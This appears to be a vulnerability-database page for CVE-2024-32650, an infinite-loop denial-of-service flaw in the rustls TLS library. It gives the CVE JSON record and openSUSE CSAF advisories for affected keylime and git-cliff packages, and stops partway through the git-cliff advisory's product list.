Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-32650 (GCVE-0-2024-32650)
Vulnerability from cvelistv5
- CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')
{ "containers": { "adp": [ { "affected": [ { "cpes": [ "cpe:2.3:a:rustls_project:rustls:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "rustls", "vendor": "rustls_project", "versions": [ { "status": "unknown", "version": "0.21.11" } ] } ], "metrics": [ { "other": { "content": { "id": "CVE-2024-32650", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-04-22T15:34:25.994212Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:49:50.274Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T02:13:40.195Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj", "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj" }, { "name": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d" }, { "name": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e" }, { "name": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e", "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "rustls", "vendor": "rustls", "versions": [ { "status": "affected", "version": "\u003e= 0.23.0, \u003c 0.23.5" }, { "status": "affected", "version": "\u003e= 0.22.0, \u003c 0.22.4" }, { "status": "affected", "version": "\u003e= 0.21.0, \u003c 0.21.11" }, { "status": "affected", "version": "= 0.20.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-835", "description": "CWE-835: Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-04-19T19:47:45.579Z", "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M" }, "references": [ { "name": "https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj", "tags": [ "x_refsource_CONFIRM" ], "url": "https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj" }, { "name": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d" }, { "name": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e" }, { "name": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e", "tags": [ "x_refsource_MISC" ], "url": "https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e" } ], "source": { "advisory": "GHSA-6g7w-8wpp-frhj", "discovery": "UNKNOWN" }, "title": "Rustls vulnerable to an infinite loop in rustls::conn::ConnectionCommon::complete_io() with proper client input" } }, "cveMetadata": { "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "assignerShortName": "GitHub_M", "cveId": "CVE-2024-32650", "datePublished": "2024-04-19T16:05:44.050Z", "dateReserved": "2024-04-16T14:15:26.876Z", "dateUpdated": "2024-08-02T02:13:40.195Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "vulnerability-lookup:meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2024-32650\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-04-19T16:15:10.940\",\"lastModified\":\"2024-11-21T09:15:23.803\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.\"},{\"lang\":\"es\",\"value\":\"Rustls es una librer\u00eda TLS moderna escrita en Rust. `rustls::ConnectionCommon::complete_io` podr\u00eda caer en un bucle infinito basado en la entrada de la red. Cuando se utiliza un servidor Rustls de bloqueo, si un cliente env\u00eda un mensaje `close_notify` inmediatamente despu\u00e9s de `client_hello`, el `complete_io` del servidor entrar\u00e1 en un bucle infinito. Esta vulnerabilidad se solucion\u00f3 en 0.23.5, 0.22.4 y 0.21.11.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-835\"}]}],\"references\":[{\"url\":\"https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}", "vulnrichment": { "containers": "{\"cna\": {\"title\": \"Rustls vulnerable to an infinite loop in rustls::conn::ConnectionCommon::complete_io() with proper client input\", \"problemTypes\": [{\"descriptions\": [{\"cweId\": \"CWE-835\", \"lang\": \"en\", \"description\": \"CWE-835: Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)\", \"type\": \"CWE\"}]}], \"metrics\": [{\"cvssV3_1\": {\"attackComplexity\": \"LOW\", \"attackVector\": \"NETWORK\", \"availabilityImpact\": \"HIGH\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"scope\": \"UNCHANGED\", \"userInteraction\": \"NONE\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"version\": \"3.1\"}}], \"references\": [{\"name\": \"https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj\", \"tags\": [\"x_refsource_CONFIRM\"], \"url\": \"https://github.com/rustls/rustls/security/advisories/GHSA-6g7w-8wpp-frhj\"}, {\"name\": \"https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/rustls/rustls/commit/2123576840aa31043a31b0770e6572136fbe0c2d\"}, {\"name\": \"https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/rustls/rustls/commit/6e938bcfe82a9da7a2e1cbf10b928c7eca26426e\"}, {\"name\": \"https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e\", \"tags\": [\"x_refsource_MISC\"], \"url\": \"https://github.com/rustls/rustls/commit/f45664fbded03d833dffd806503d3c8becd1b71e\"}], \"affected\": [{\"vendor\": \"rustls\", \"product\": \"rustls\", \"versions\": [{\"version\": \"\u003e= 0.23.0, \u003c 0.23.5\", \"status\": \"affected\"}, {\"version\": \"\u003e= 0.22.0, \u003c 0.22.4\", \"status\": \"affected\"}, {\"version\": \"\u003e= 0.21.0, \u003c 0.21.11\", \"status\": \"affected\"}, {\"version\": \"= 0.20.0\", \"status\": \"affected\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-04-19T19:47:45.579Z\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.\"}], \"source\": {\"advisory\": \"GHSA-6g7w-8wpp-frhj\", \"discovery\": \"UNKNOWN\"}}, \"adp\": [{\"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-32650\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-04-22T15:34:25.994212Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:rustls_project:rustls:*:*:*:*:*:*:*:*\"], \"vendor\": \"rustls_project\", \"product\": \"rustls\", \"versions\": [{\"status\": \"unknown\", \"version\": \"0.21.11\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-04-22T14:56:20.057Z\"}, \"title\": \"CISA ADP Vulnrichment\"}]}", "cveMetadata": "{\"cveId\": \"CVE-2024-32650\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"state\": \"PUBLISHED\", \"assignerShortName\": \"GitHub_M\", \"dateReserved\": \"2024-04-16T14:15:26.876Z\", \"datePublished\": \"2024-04-19T16:05:44.050Z\", \"dateUpdated\": \"2024-06-04T17:49:50.274Z\"}", "dataType": "CVE_RECORD", "dataVersion": "5.1" } } }
opensuse-su-2024:13923-1
Vulnerability from csaf_opensuse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "keylime-ima-policy-0.2.5~0-1.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the keylime-ima-policy-0.2.5~0-1.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-13923", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13923-1.json" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "keylime-ima-policy-0.2.5~0-1.1 on GA media", "tracking": { "current_release_date": "2024-06-15T00:00:00Z", "generator": { "date": "2024-06-15T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:13923-1", "initial_release_date": "2024-06-15T00:00:00Z", "revision_history": [ { "date": "2024-06-15T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.5~0-1.1.aarch64", "product": { "name": "keylime-ima-policy-0.2.5~0-1.1.aarch64", "product_id": "keylime-ima-policy-0.2.5~0-1.1.aarch64" } }, { "category": "product_version", "name": "rust-keylime-0.2.5~0-1.1.aarch64", "product": { "name": "rust-keylime-0.2.5~0-1.1.aarch64", "product_id": "rust-keylime-0.2.5~0-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.5~0-1.1.ppc64le", "product": { "name": "keylime-ima-policy-0.2.5~0-1.1.ppc64le", "product_id": "keylime-ima-policy-0.2.5~0-1.1.ppc64le" } }, { "category": "product_version", "name": "rust-keylime-0.2.5~0-1.1.ppc64le", "product": { "name": "rust-keylime-0.2.5~0-1.1.ppc64le", "product_id": "rust-keylime-0.2.5~0-1.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.5~0-1.1.s390x", "product": { "name": "keylime-ima-policy-0.2.5~0-1.1.s390x", "product_id": "keylime-ima-policy-0.2.5~0-1.1.s390x" } }, { "category": "product_version", "name": "rust-keylime-0.2.5~0-1.1.s390x", "product": { "name": "rust-keylime-0.2.5~0-1.1.s390x", "product_id": "rust-keylime-0.2.5~0-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.5~0-1.1.x86_64", "product": { "name": "keylime-ima-policy-0.2.5~0-1.1.x86_64", "product_id": "keylime-ima-policy-0.2.5~0-1.1.x86_64" } }, { "category": "product_version", "name": "rust-keylime-0.2.5~0-1.1.x86_64", "product": { "name": "rust-keylime-0.2.5~0-1.1.x86_64", "product_id": "rust-keylime-0.2.5~0-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "keylime-ima-policy-0.2.5~0-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.aarch64" }, "product_reference": "keylime-ima-policy-0.2.5~0-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "keylime-ima-policy-0.2.5~0-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.ppc64le" }, "product_reference": "keylime-ima-policy-0.2.5~0-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "keylime-ima-policy-0.2.5~0-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.s390x" }, "product_reference": "keylime-ima-policy-0.2.5~0-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "keylime-ima-policy-0.2.5~0-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.x86_64" }, "product_reference": "keylime-ima-policy-0.2.5~0-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.5~0-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.aarch64" }, "product_reference": "rust-keylime-0.2.5~0-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.5~0-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.ppc64le" }, "product_reference": "rust-keylime-0.2.5~0-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.5~0-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.s390x" }, "product_reference": "rust-keylime-0.2.5~0-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.5~0-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.x86_64" }, "product_reference": "rust-keylime-0.2.5~0-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.aarch64", "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.ppc64le", "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.s390x", "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.x86_64", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.aarch64", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.ppc64le", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.s390x", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.aarch64", "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.ppc64le", "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.s390x", "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.x86_64", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.aarch64", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.ppc64le", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.s390x", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.aarch64", "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.ppc64le", "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.s390x", "openSUSE Tumbleweed:keylime-ima-policy-0.2.5~0-1.1.x86_64", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.aarch64", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.ppc64le", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.s390x", "openSUSE Tumbleweed:rust-keylime-0.2.5~0-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
opensuse-su-2024:0130-1
Vulnerability from csaf_opensuse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Security update for git-cliff", "title": "Title of the patch" }, { "category": "description", "text": "This update for git-cliff fixes the following issues:\n\n- update to 2.2.2:\n * (changelog) Allow adding custom context\n * (changelog) Ignore empty lines when using split_commits\n * (parser) Allow matching empty commit body\n * Documentation updates\n\n- update to 2.2.1:\n * Make rendering errors more verbose\n * Support detecting config from project manifest\n * Make the bump version rules configurable\n * bug fixes and documentation updates\n- CVE-2024-32650: rust-rustls: Infinite loop with proper client\n input fixes (boo#1223218)\n\n- Update to version 2.1.2:\n * feat(npm): add programmatic API for TypeScript\n * chore(fixtures): enable verbose logging for output\n * refactor(clippy): apply clippy suggestions\n * refactor(changelog): do not output to stdout when prepend is used\n * feat(args): add `--tag-pattern` argument\n * fix(config): fix commit parser regex in the default config\n * fix(github): sanitize the GitHub token in debug logs\n * chore(config): add animation to the header of the changelog\n * refactor(clippy): apply clippy suggestions\n * docs(security): update security policy\n * chore(project): add readme to core package\n * chore(embed): do not allow missing docs\n * chore(config): skip dependabot commits for dev updates\n * docs(readme): mention RustLab 2023 talk\n * chore(config): revamp the configuration files\n * chore(docker): update versions in Dockerfile\n * chore(example): use full links in GitHub templates\n * chore(project): bump MSRV to 1.74.1\n * revert(config): use postprocessors for checking the typos\n * feat(template): support using PR labels in the GitHub template\n * docs(configuration): fix typo\n * feat(args): add `--no-exec` flag for skipping command execution\n * chore(command): explicitly set the directory of command to current dir\n * refactor(ci): use hardcoded workspace members for cargo-msrv command\n * refactor(ci): simplify cargo-msrv installation\n * refactor(clippy): apply clippy suggestions\n * refactor(config): use postprocessors for checking the typos\n * chore(project): update copyright years\n * chore(github): update templates about GitHub integration\n * feat(changelog): set the timestamp of the previous release\n * feat(template): support using PR title in the GitHub template\n * feat(changelog): improve skipping via `.cliffignore` and `--skip-commit`\n * chore(changelog): disable the default behavior of next-version\n * fix(git): sort commits in topological order\n * test(changelog): use the correct version for missing tags\n * chore(changelog): use 0.1.0 as default next release if no tag is found\n * feat(github)!: support integration with GitHub repos\n * refactor(changelog): support `--bump` for processed releases\n * fix(cli): fix broken pipe when stdout is interrupted\n * test(fixtures): update the bumped value output to add prefix\n * feat(changelog): support tag prefixes with `--bump`\n * feat(changelog)!: set tag to `0.0.1` via `--bump` if no tags exist\n * fix(commit): trim the trailing newline from message\n * docs(readme): use the raw link for the animation\n * chore(example): remove limited commits example\n * feat(args): add `-x` short argument for `--context`\n * revert(deps): bump actions/upload-pages-artifact from 2 to 3\n * revert(deps): bump actions/deploy-pages from 3 to 4\n * chore(dependabot): group the dependency updates for creating less PRs\n * feat(parser): support using SHA1 of the commit\n * feat(commit): add merge_commit flag to the context\n * chore(mergify): don\u0027t update PRs for the main branch\n * fix(links): skip checking the GitHub commit URLs\n * fix(changelog): fix previous version links\n * feat(parser): support using regex scope values\n * test(fixture): update the date for example test fixture\n * docs(fixtures): add instructions for adding new fixtures\n * feat(args): support initialization with built-in templates\n * feat(changelog)!: support templating in the footer\n * feat(args): allow returning the bumped version\n * test(fixture): add test fixture for bumping version\n * fix: allow version bump with a single previous release\n * fix(changelog): set the correct previous tag when a custom tag is given\n * feat(args): set `CHANGELOG.md` as default missing value for output option\n * refactor(config): remove unnecessary newline from configs\n\n- Update to version 1.4.0:\n * Support bumping the semantic version via `--bump`\n * Add \u0027typos\u0027 check\n * Log the output of failed external commands -\n * breaking change: Support regex in \u0027tag_pattern\u0027 configuration\n * Add field and value matchers to the commit parser\n\n- Update to version 1.2.0:\n * Update clap and clap extras to v4 \n * Make the fields of Signature public\n * Add a custom configuration file for the repository\n * Support placing configuration inside pyproject.toml \n * Generate SBOM/provenance for the Docker image\n * Support using regex group values \n * [breaking] Nested environment config overrides \n * Set max of limit_commits to the number of commits \n * Set the node cache dependency path\n * Use the correct argument in release script\n\n- Update to version 1.1.2:\n * Do not skip all tags when skip_tags is empty (#136)\n * Allow saving context to a file (#138)\n * Derive the tag order from commits instead of timestamp (#139)\n * Use timestamp for deriving the tag order (#139)\n\n- Update to version 1.1.1:\n * Relevant change: Update README.md about the NPM package\n * Fix type casting in base NPM package\n * Rename the package on Windows\n * Disable liquid parsing in README.md by using raw blocks\n * Support for generating changelog for multiple git repositories\n * Publish binaries for more platforms/architectures\n\n- Update to version 1.0.0:\n * Bug Fixes\n - Fix test fixture failures\n * Documentation\n - Fix GitHub badges in README.md\n * Features\n - [breaking] Replace --date-order by --topo-order\n - Allow running with --prepend and --output\n - [breaking] Use current time for --tag argument\n - Include completions and mangen in binary releases\n - Publish Debian package via release workflow\n * Miscellaneous Tasks\n - Run all test fixtures\n - Remove deprecated set-output usage\n - Update actions/checkout to v3\n - Comment out custom commit preprocessor\n * Refactor\n - Apply clippy suggestions\n * Styling\n - Update README.md about the styling of footer field\n", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-2024-130", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_0130-1.json" }, { "category": "self", "summary": "URL for openSUSE-SU-2024:0130-1", "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RLZMKRAPDN7C43S56JAGULAWF4RXGB2S/" }, { "category": "self", "summary": "E-Mail link for openSUSE-SU-2024:0130-1", "url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RLZMKRAPDN7C43S56JAGULAWF4RXGB2S/" }, { "category": "self", "summary": "SUSE Bug 1223218", "url": "https://bugzilla.suse.com/1223218" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "Security update for git-cliff", "tracking": { "current_release_date": "2024-05-18T12:51:03Z", "generator": { "date": "2024-05-18T12:51:03Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:0130-1", "initial_release_date": "2024-05-18T12:51:03Z", "revision_history": [ { "date": "2024-05-18T12:51:03Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "git-cliff-2.2.2-bp155.2.3.1.aarch64", "product": { "name": "git-cliff-2.2.2-bp155.2.3.1.aarch64", "product_id": "git-cliff-2.2.2-bp155.2.3.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "git-cliff-2.2.2-bp155.2.3.1.i586", "product": { "name": 